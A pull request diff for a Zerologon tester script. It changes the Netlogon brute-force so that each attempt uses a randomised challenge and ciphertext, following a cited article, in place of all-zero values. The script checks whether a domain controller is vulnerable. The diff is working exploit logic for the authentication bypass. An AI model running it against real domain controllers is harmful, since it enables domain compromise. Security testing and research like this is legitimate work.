### PR TITLE
Implement different challenges, from article "Zeroing in on Zerologn crypto:More than zeros"

### DIFF
--- a/zerologon_tester.py
+++ b/zerologon_tester.py
@@ -9,25 +9,46 @@ import hmac, hashlib, struct, sys, socket, time
 from binascii import hexlify, unhexlify
 from subprocess import check_call
 
+from random import randrange
+
 # Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
 MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
 
 def fail(msg):
-  print(msg, file=sys.stderr)
+  print('\n' + msg, file=sys.stderr)
   print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
   sys.exit(2)
 
-def try_zero_authenticate(dc_handle, dc_ip, target_computer):
-  # Connect to the DC's Netlogon service.
-  binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
-  rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
-  rpc_con.connect()
-  rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
+def try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer):
 
-  # Use an all-zero challenge and credential.
-  plaintext = b'\x00' * 8
-  ciphertext = b'\x00' * 8
+  # 1. Use an all-zero challenge and credential.
+  # plaintext = b'\x12' * 8
+  # ciphertext = b'\x00' * 8
 
+  # alternative attacks presented here by Tal Be'ery:
+  # https://medium.com/@TalBeerySec/zeroing-in-on-zerologon-crypto-more-than-zeros-5d90fe5e4fd3
+
+  # 2. choose a random value and use a challenge with this value 8 times.
+  #a=randrange(0,256)
+  #plaintext=bytes(map(lambda x:a, range(8)))
+
+  #ciphertext = b'\x00' * 8
+
+  # 3. choose 2 random bytes a,b.
+  # plaintext = 7 times a, then b
+  # ciphertext = 7 times 0, then a xor b
+  a=randrange(0,256)
+  b=randrange(0,256)
+  plaintext=bytearray(8)
+  ciphertext=bytearray(8)
+  
+  for i in range(7):
+    plaintext[i]=a
+    ciphertext[i]=0
+  
+  plaintext[7]=b
+  ciphertext[7]=(b^a) & 255 
+  
   # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. 
   flags = 0x212fffff
 
@@ -55,18 +76,23 @@ def try_zero_authenticate(dc_handle, dc_ip, target_computer):
 
 
 def perform_attack(dc_handle, dc_ip, target_computer):
+  # Connect to the DC's Netlogon service.
+  binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
+  rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
+  rpc_con.connect()
+  rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
+
   # Keep authenticating until succesfull. Expected average number of attempts needed: 256.
   print('Performing authentication attempts...')
-  rpc_con = None
   for attempt in range(0, MAX_ATTEMPTS):  
-    rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
+    result = try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer)
     
-    if rpc_con == None:
-      print('=', end='', flush=True)
+    if result == None:
+      print('\rAttempt {:4d} on {}  '.format(attempt+1, MAX_ATTEMPTS), end='', flush=True)
     else:
       break
 
-  if rpc_con:
+  if result:
     print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
   else:
     print('\nAttack failed. Target is probably patched.')


### PR DESCRIPTION
This PR introduces modifications in the plaintext and ciphertext, as described in article  "Zeroing in on Zerologn crypto:More than zeros" by Tal Be'ery (@talbeerysec), available here:
https://medium.com/@TalBeerySec/zeroing-in-on-zerologon-crypto-more-than-zeros-5d90fe5e4fd3

2 alternatives challenges are used:
8 bytes of the same value: the ciphertext remains 8 zeroes.
7 bytes of the same value a, and the last byte of value b. The ciphertext is 7 zeroes, and a xor b for the last byte.

A different challenge is used for each attempt, which still have 1/256 chance to success.